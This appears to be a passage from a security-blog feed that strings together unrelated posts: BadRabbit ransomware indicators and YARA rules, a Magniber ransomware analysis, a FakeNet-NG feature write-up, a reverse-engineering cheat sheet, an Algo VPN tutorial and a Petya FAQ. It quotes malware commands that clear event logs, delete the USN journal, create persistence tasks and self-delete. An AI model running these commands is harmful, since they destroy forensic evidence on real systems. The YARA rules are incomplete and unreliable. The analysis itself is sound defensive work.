Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit DiskCryptor driver

File: <rand_4_hex>.tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: \system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note that “15” is the default value present in the malware and may be altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST <HH:MM:00>
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D <current_drive_letter>:
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id <rand_task_id> && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
other user
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)

Yara Rules

rule FE_Hunting_BADRABBIT {
        author="ian.ahl @TekDefense & nicholas.carr @itsreallynick"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
        // Messages
        $msg1 = "Incorrect password" nocase ascii wide
        $msg2 = "Oops! Your files have been encrypted." ascii wide
        $msg3 = "If you see this text, your files are no longer accessible." ascii wide
        $msg4 = "You might have been looking for a way to recover your files." ascii wide
        $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
        $msg6 = "Visit our web service at" ascii wide
        $msg7 = "Your personal installation key#1:" ascii wide
        $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
        $msg9 = "Password#1" nocase ascii wide
        $msg10 = "caforssztxqzf2nm.onion" nocase ascii wide
        $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

        // File references
        $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
        $fref2 = "\\\\.\\dcrypt" nocase ascii wide
        $fref3 = "Readme.txt" ascii wide
        $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii wide
        $fref5 = "dispci.exe" nocase ascii wide
        $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide
        // META
        $meta1 = "" nocase ascii wide
        $meta2 = "dispci.exe" nocase ascii wide
        $meta3 = "GrayWorm" ascii wide
        $meta4 = "viserion" nocase ascii wide
        $com1 = "ComSpec" ascii wide
        $com2 = "\\cmd.exe" nocase ascii wide
        $com3 = "schtasks /Create" nocase ascii wide
        $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
        (uint16(0) == 0x5A4D)
        (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*))
        (all of ($meta*) and 8 of ($msg*))

            author = "muhammad.umair"
            md5 = "fbbdc39af1139aebba4da004475e8839"
            rev = 1
            $api1 = "GetSystemDirectoryW" fullword
            $api2 = "GetModuleFileNameW" fullword
            $dropped_dll = "infpub.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them

            author = "muhammad.umair"
            md5 = "1d724f95c61f1055f0d02c2154bbccd3"
            rev = 1
            $api1 = "WNetAddConnection2W" fullword
            $api2 = "CredEnumerateW" fullword
            $api3 = "DuplicateTokenEx" fullword
            $api4 = "GetIpNetTable"
            $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
            $dropped_driver = "cscc.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
            $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them

            author = "muhammad.umair"
            md5 = "37945c44a897aa42a66adcab68f560e0"
            rev = 1
            $api1 = "WriteProcessMemory" fullword
            $api2 = "SetSecurityDescriptorDacl" fullword
            $api_str1 = "BCryptDecrypt" ascii fullword wide
            $mimi_str = "CredentialKeys" ascii fullword wide
            $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them

            author = "muhammad.umair"
            md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
            rev = 1
            $api1 = "CryptAcquireContextW" fullword
            $api2 = "CryptEncrypt" fullword
            $api3 = "NetWkstaGetInfo" fullword
            $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
            $msg1 = "Disk decryption progress..." ascii fullword wide
            $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
            $tok1 = "\\\\.\\dcrypt" ascii fullword wide
            $tok2 = "C:\\Windows\\cscc.dat" ascii fullword wide
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them

New FakeNet-NG Feature: Content-Based Protocol Detection

I (Matthew Haigh) recently contributed to FLARE’s FakeNet-NG network simulator by adding content-based protocol detection and configuration. This feature is useful for analyzing malware that uses a protocol over a non-standard port; for example, HTTP over port 81. The new feature also detects and adapts to SSL so that any protocol can be used with SSL and handled appropriately by FakeNet-NG. We were motivated to add this feature since it was a feature of the original FakeNet and it was needed for real world malware.

What is FakeNet-NG

FakeNet-NG simulates a network so malware analysts can run samples with network functionality without the risks of an Internet connection. Analysts can examine network-based indicators via FakeNet-NG’s textual and pcap output. It is plug-and-play, configurable, and works on both Windows and Linux. FakeNet-NG simulates common protocols to trick malware into thinking it is connected to the Internet. FakeNet-NG supports the following protocols: DNS, HTTP, FTP, POP, SMTP, IRC, SSL, and TFTP.

Previous Design

Previously FakeNet-NG employed Listener modules, which were bound to configurable ports for each protocol. Any traffic on those ports was received by the socket and processed by the Listener. 

In the previous architecture, packets were redirected using a Diverter module that utilized WinDivert for Windows and netfilter for Linux. Each incoming and outgoing packet was examined by the Diverter, which kept a running list of connections. Packets destined for outbound ports were redirected to a default Listener, which would respond to any packet with an echo of the same data. The Diverter also redirected packets based on whether FakeNet-NG was run in Single-Host or Multi-Host mode, and if any applications were blacklisted or whitelisted according to the configuration. It would simply release the packet on the appropriate port and the intended Listener would receive it on the socket.

New Design

My challenge was to eliminate this port/protocol dependency. In order to disassociate the Listeners from the corresponding ports, a new architecture was needed. The first challenge was to maintain Listener functionality. The original architecture relied on Python libraries that interact with the socket. Therefore, we needed to maintain “socket autonomy” in the Listener, so we added a “taste()” function for each Listener. The routine returns a confidence score based on the likelihood that the packet is associated with the protocol. Figure 1 demonstrates the taste() routine for HTTP, which looks for the request method string at the beginning of the packet data. It gives an additional point if the packet is on a common HTTP port. There were several choices for how these scores were to be tabulated. It could not happen in the Diverter because of the TCP handshake. The Diverter could not sample data from data-less handshake packets, and if the Diverter completed the handshake, the connection could not easily be passed to a different socket at the Listener without disrupting the connection.

Figure 1: HTTP taste() example


We ultimately decided to add a proxy Listener that maintains full-duplex connections with the client and the Listener, with both sides unaware of the other. This solves the handshake problem and maintains socket autonomy at the Listener. The proxy is also easily configurable and enables new functionality. We substituted the proxy for the echo-server default Listener, which would receive traffic destined for unbound ports. The proxy peeks at the data on the socket, polls the Listeners, and creates a new connection with the Listener that returns the highest score. The echo-server always returns a score of one, so it will be chosen if no better option is detected. The analyst controls which Listeners are bound to ports and which Listeners are polled by the proxy. This means that the listeners do not have to be exposed at all; everything can be decided by the proxy. The user can set the Hidden option in the configuration file to False to ensure the Listener will be bound to the port indicated in the configuration file. Setting Hidden to True will force any packets to go through the proxy before accessing the Listener. For example, if the analyst suspects that malware is using FTP on port 80, she can ‘hide’ HTTP from catching the traffic, and let the proxy detect FTP and forward the packet to the FTP Listener. Additional configuration options exist for choosing which protocols are polled by the proxy. See Figure 2 and Figure 3 for configuration examples. Figure 2 is a basic configuration for a Listener, and Figure 3 demonstrates how the proxy is configurable for TCP and UDP.

Figure 2: Listener Configuration Options

Figure3: Proxy Configuration Options

The proxy also handles SSL detection. Before polling the Listeners, the proxy examines the packet. If SSL is detected, the proxy “wraps” the socket in SSL using Python’s OpenSSL library. With the combination of protocol and SSL detection, each independent of the other, FakeNet-NG can now handle just about any protocol combination.

The proxied SSL implementation also allows for improved packet analysis. The connection between the proxy and the Listener is not encrypted, which allows FakeNet to dump un-encrypted packets to the pcap output. This makes it easier for the analyst to examine the packet data. FakeNet continues to produce pcap output that includes packet data before and after modification by FakeNet. While this results in repetitive data, it is often useful to see the original packet along with the modification.


Figure 4 shows verbose (-v) output from FakeNet on Windows responding to an HTTP request on port 81 from a clowncar malware variant (SHA-256 8d2dfd609bcbc94ff28116a80cf680660188ae162fc46821e65c10382a0b44dc). Malware such as clowncar use traditional protocols over non-standard ports for many reasons. FakeNet gives the malware analyst the flexibility to detect and respond to these cases automatically.

Figure 4: clowncar malware using HTTP on port 81


FLARE’s FakeNet-NG tool is a powerful network-simulation tool available for Windows and Linux. The new content-based protocol detection and SSL detection features ensure that FakeNet-NG remains the most useful tool for malware analysts. Configuration options give programmers the flexibility necessary to respond to malware using most protocols on any port.

Magniber Ransomware Wants to Infect Only the Right People


Exploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.

In Figure 1, which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.

Figure 1: Magnitude EK distribution as seen in March 2017

This trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large chunk targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline of Cerber being distributed via email) and now it is distributing ransomware known as Magniber. 


The first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain: fastprofit[.]loan. The infection chain is shown in Figure 2.

Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched. Figure 3 shows the landing page and CVE usage.

Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4) and domain infrastructure is hosted on the following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”

Figure 4: Magnitude payload header and plain MZ response


In the initial report published by our colleagues at Trend Micro, the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won’t execute if the system language is not Korean.

Magniber encrypts user data using the AES128. The sample used (dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publically by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.

The malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters. They are as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits (instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.

Figure 5: Language check targeted at Korea

A mutex with name "ihsdj" is created to prevent multiple executions. The payload then generates a pseudorandom 19-character string based on the CPU clock from multiple GetTickCount calls. The string is then used to create a file in the user’s %TEMP% directory (e.g. "xxxxxxxxxxxxxxxxxxx.ihsdj"), which contains the IV (Initialization Vector) for the AES128 encryption and a copy of the malware itself with the name "ihsdj.exe".

Next, the malware constructs 4 URLs for callback. It uses the 19-character long pseudorandom string it generated, and the following domains to create the URLs:


In order to evade sandbox systems, the malware checks to see if it's running inside a VM and appends the result to the URL callback. It does this by sandwiching and executing CPUID instructions (shown in Figure 6) between RDTSC calls, forcing VMEXIT.

Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is done multiple times to gather the average execution time of the CPUID, and if the average execution time is greater than 1000, it considers the system to be a VM. In case the test fails and the malware thinks the system is a VM, a "1" is appended at the end of the URL (see Figure 7); otherwise, "0" is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0

Figure 7: Command and control communication

If the malware is executed a second time after encryption, the callback URL ends in "end0" or "end1" instead of "new". An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system, renaming them by adding a ".ihsdj" extension to the end. The AES128 Key and IV for the sample analyzed are listed:

  • IV: EP866p5M93wDS513
  • AES128 Key: S25943n9Gt099y4K

A text file "READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt" is created in the user’s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.

Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP% with compatibility assistant, and loads the user message as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a %TEMP%\ihsdj.exe
  • schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting, using the following local ping to provide delay for the deletion:

  • cmd /c ping localhost -n 3 > nul & del C:\PATH\MALWARE.EXE)

Figure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.

Figure 9: Python script for unpacking malware payload


Ransomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk – especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye NX blocks delivery at the infection point.


Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malverstiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement our understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX .
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE/ JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from “interesting” code block to the other.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science

Many attackers continue to leverage PowerShell as a part of their malware ecosystem, mostly delivered and executed by malicious binaries and documents. Of malware that uses PowerShell, the most prevalent use is the garden-variety stager: an executable or document macro that launches PowerShell to download another executable and run it. There has been significant development and innovation in the field of offensive PowerShell techniques. While defenders and products have implemented greater PowerShell visibility and improved detection, the offensive PowerShell community has adapted their tools to avoid signature-based detections. Part of this response has come through an increased use of content obfuscation – a technique long employed at both the binary and content level by traditional malware authors.

In our Revoke-Obfuscation white paper, first presented at Black Hat USA 2017, we provide background on obfuscated PowerShell attacks seen in the wild, as well as defensive mitigation and logging best practices. We then make the case for the inefficiencies of static detection by exploring the many layers of obfuscation now available to attackers for launching PowerShell scripts, shortening and complicating commands contained within the scripts, manipulating strings, and using alternate and obscure methods to evade defenders. We then present a number of unique approaches for interpreting, categorizing, and processing obfuscated PowerShell attributes in order to build a framework for high fidelity obfuscation detection. To support our research, we collected an unprecedented PowerShell data corpus comprised of 408,000 scripts – including 7,000 manually-reviewed and labeled scripts – from a vast set of sources, both public and previously unavailable. In addition to releasing the PowerShell data corpus, we have released the Revoke-Obfuscation framework, which has been used in numerous Mandiant investigations, to assist the security community in classifying PowerShell scripts’ obfuscation at scale.

Download the Revoke-Obfuscation white paper today, and also check out our presentation from Black Hat USA 2017.

Revoke-Obfuscation is the result of industry research collaboration between Daniel Bohannon (@danielhbohannon), Senior Applied Security Researcher at Mandiant/FireEye, and Lee Holmes (@Lee_Holmes), Lead Security Architect of Azure Management at  Microsoft .

How to Deploy Your Own Algo VPN Server in the DigitalOcean Cloud

When analyzing malware or performing other security research, it’s often useful to tunnel connections through a VPN in a public cloud. This approach helps conceal the analyst’s origin, contributing to OPSEC when interacting with malicious infrastructure. Moreover, by using VPN exit nodes in different cities and even countries, the researcher can explore the target from multiple geographic vantage points, which sometimes yields additional findings.

One way to accomplish this is to set up your own VPN server in a public cloud, as an alternative to relying on a commercial VPN service. The following tutorial explains how to deploy the Algo VPN software bundle on DigitalOcean (the link includes my referral code). I like using DigitalOcean for this purpose because it offers low-end virtual private server instances for as little as $5 per month; also, I find it easier to use than AWS.

Algo VPN Overview

Algo is an open source software bundle designed for self-hosted IPSec VPN services. It was designed by the folks at Trail of Bits to be easy to deploy, rely only on modern protocols and ciphers and provide reasonable security defaults. Also, it doesn’t require dedicated VPN client software for connecting from most systems and devices, because of native IPSec support.

To understand why its creators believe Algo is a better alternative to commercial VPNs, the Streisand VPN bundle and OpenVPN, read the blog post that announced Algo’s initial release.  As outlined in the post, Algo is meant “to be easy to set up. That way, you start it when you need it, and tear it down before anyone can figure out the service you’re routing your traffic through.”

Creating a DigitalOcean Virtual Private Server

To obtain an Internet-accessible system where you’ll install Algo VPN server software, you can create a “droplet” on DigitalOcean running Ubuntu 16.04 with a few clicks.

Accepting default options for the droplet should be OK in most cases. If you’re not planning to tunnel a lot of traffic through the system, selecting the least expensive size will probably suffice. Select the geographic region where the Virtual Private Server will run based on your requirements. Assign a hostname that appeals to you.

Once the new host is active, make a note of the public IP address that DigitalOccean assigns to it and log into it using SSH. Then run the following commands inside the new virtual private server to update its OS and install Algo VPN core prerequisites:

apt-add-repository -y ppa:ansible/ansible
apt-get update -y
apt-get upgrade -y
apt-get install -y software-properties-common python-virtualenv ansible

At this point you could harden the configuration of the virtual private server, but these steps are outside the scope of this guide.

Installing Algo VPN Server Software

Next, obtain the latest Algo VPN server software on the newly-setup droplet and prepare for the installation by executing the following commands:

git clone
cd algo
python -m virtualenv env
source env/bin/activate

Set up the username for the people who will be using the VPN. To accomplish this, use your favorite text editor, such as Nano or Vim to edit the config.cfg file in the ~/algo directory:

vim config.cfg

Remove the lines that represent the default users “dan” and “jack” and add your own (e.g., “john”), so that the corresponding section of the file looks like this:

 - john

After saving the file and exiting the text editor, execute the following command in the ~/algo directory to install Algo software:


When prompted by the installer, select 5 to install “to existing Ubuntu 16.04 server”.

When proceeding with the installer, you should be OK  in most cases by accepting default answers with a few exceptions:

  • When asked about the public IP address of the server, enter the IP address assigned to the virtual private server by DigitalOcean when you created the droplet.
  • If planning to VPN from Windows 10 or Linux desktop client systems, answer “Y” to the corresponding question.

After providing the answers, give the installer a few minutes to complete its tasks. (Be patient.) Once it finishes, you’ll see the “Congratulations!” message, stating that your Algo server is running. Make a note of the “p12 and SSH keys password for new users” that the message will display, in case you need to use it later.

Configuring VPN Clients

Once you’ve set up the Alog VPN service, follow the instructions on the Algo website to configure your VPN client. The steps are different for each OS. Fortunately, the Algo setup process generates files that allow you to accomplish this with relative ease. It stores the files in under ~/algo/configs in a subdirectory whose name matches your server’s IP address.

For instance, to configure your iOS device, transfer your user’s Apple Profile file that has the .mobileconfig extension (e.g., john.mobileconfig) to the device, then open the file to install it. Once this is done, you can go to Settings > VPN on your iOS device to enable the VPN when you wish to use it. If at some point you wish to delete this VPN profile, go to General > Profile.

If setting up the VPN client on Windows 10, retrieve from the Algo server your user’s file with the .ps1 extension (e.g., windows_john.ps1) and the file with the .p12 extension (e.g., john.p12). Then, open the Administrator shell on the Windows system and execute the following command from the folder where you’ve placed these files, adjusting the file name to match your name:

powershell -ExecutionPolicy ByPass -File windows_john.ps1 Add

This will import the appropriate certificate information and create the VPN connection entry. To connect to the VPN server, go to Settings > Network & Internet > VPN. If you wish to remove the VPN entry, use the PowerShell command above, replacing “Add” with “Remove”.

Additional Considerations for Algo VPN

Before relying on VPN to safeguard your interactions with malicious infrastructure, be sure to confirm that it’s concealing the necessary aspects of your origin. If it’s working properly, the remote host should see the IP address of your VPN servers, instead of the IP address of your VPN client. Similarly, your DNS traffic should be getting directed through the VPN tunnel, concealing your client’s locally-configured DNS server. One way to validate this is to use, comparing what information the site reveals before and after you activate your VPN connection. Also, confirm that you’re not leaking your origin over IPv6; one way to do that is by connecting to

You can turn off the virtual private server when you don’t need it. When you boot it up again, Algo VPN software will automatically launch in the background. If running the server for longer periods of time, you should implement security measures necessary appropriate for Internet-connected infrastructure.

As you use your Algo VPN server, adversaries might begin tracking the server’s IP address and eventually blacklist it. Therefore, it’s a good idea to periodically destroy this DigitalOcean droplet and create a new one from scratch. This will not only change the server’s IP address, but also ensure that you’re running the latest version of VPN software and its dependencies. Unfortunately, after you do this, you’ll need to reimport VPN client profiles to match the new server’s IP address and certificate details.


Revision history:

  • 29th of June, 2017 18:00 (UTC +2) – Update 2 (current) – Added Q11
  • 28th of June, 2017 22:00 (UTC +2) – Update 1 – Initial FAQ

Q1 Is the Petya attack still in progress?
A: The initial attack vector appears to have been the accounting software M.E.Doc, for which a malicious software update was pushed, that was executed by clients in an automated fashion. Multiple organisations confirmed that this was their initial infection vector. After the initial infection vector Petya can utilize different kind of spreading mechanisms:

Using the EternalBlue and EternalRomance exploits, which are both exploits of the NSA that were published on the 14th of April 2017 by the Shadow Brokers. These exploits can be used to gain unauthorized access to remote Windows systems and execute malicious software with administrative privileges. Using a variety of methods, both legitimate and illegitimate. The following 4 steps are followed by the malware to spread itself:

  1. Tries to find credentials:
    • Method 1: Uses a custom tool to extract credentials from memory (code similarities with MimiKatz and accesses Windows LSASS process)
    • Method 2: Steals credentials from the credential store on the infected systems
  2. Makes an inventory of the local network for other machines. If found, it checks whether port 139 or 445 is open
  3. Checks via WebDAV whether the enumerated systems have already been infected. If this is not the case, it will transfer the malware to the other systems via SMB;
  4. Utilizes PSEXEC or WMI tools, to remotely execute the malware.

Please note that the initial infection vector of the M.E.Doc update (and a related watering hole attack on a Ukrainian website) were cleaned. However, Petya can still spread to the following networks for a limited amount of time, based on the functionality outlined above:

  1. The local network (reserved IP spaces);
  2. To remote networks of third parties that are directly connected with the networks that contain systems that are already infected with Petya.

Q2 Which attack vectors are used to enter internal networks of organizations?
A At the moment the first infection method that has been observed in the wild concerns the infected update from M.E.Doc. After initial entry into an internal network of an affected organization has been obtained, different spreading methods are used to further infect systems. These methods include the NSA exploits EternalBlue and EternalRomance in combination with harvesting and reusing passwords to perform remote command execution (with psexec and WMI) on other systems.

Q3 Are only companies affected  that use M.E.Doc?
A No, the attack initially targeted organizations that were using M.E.Doc, but the worm also spread to other (connected) organizations that were not related to M.E.Doc.

Q4 How is it possible that I became infected with Petya, while being full up to date and having all patches installed?
A: The Microsoft patch MS17-010 protects Windows systems against direct infection by the EternalBlue and EnternalRomance NSA-exploits. However, Petya includes additional methods to spread to Windows systems.

Most notably, the Petya malware can extract local Administrator and domain credentials from systems that are initially infected (for example because these systems were not patched). Subsequently, the malware can leverage these administrative credentials in combination with legitimate Microsoft tools and protocols (PSEXEC and WMI) to infect fully patched Windows systems.

Q5 How can I check if my organization is at risk for the Petya attack?
A Checking if you are at risk for this attack involves multiple actions, due to the fact that the attack itself uses different methods to propagate within networks. The following actions can be performed to identify potential vulnerable machines within the network:

  • Perform a network portscan to identify systems on which the TCP ports 139 and 445 are open. The more machines that are accessible on these ports, the more potential risk of the attack spreading to large amounts of systems within the network.
  • Perform a vulnerability scan to identify machines which are missing the MS17-010 (and the KB2871997) patch. If the patches are missing, the identified systems are vulnerable to the one of the spreading and infection methods used by the malware.
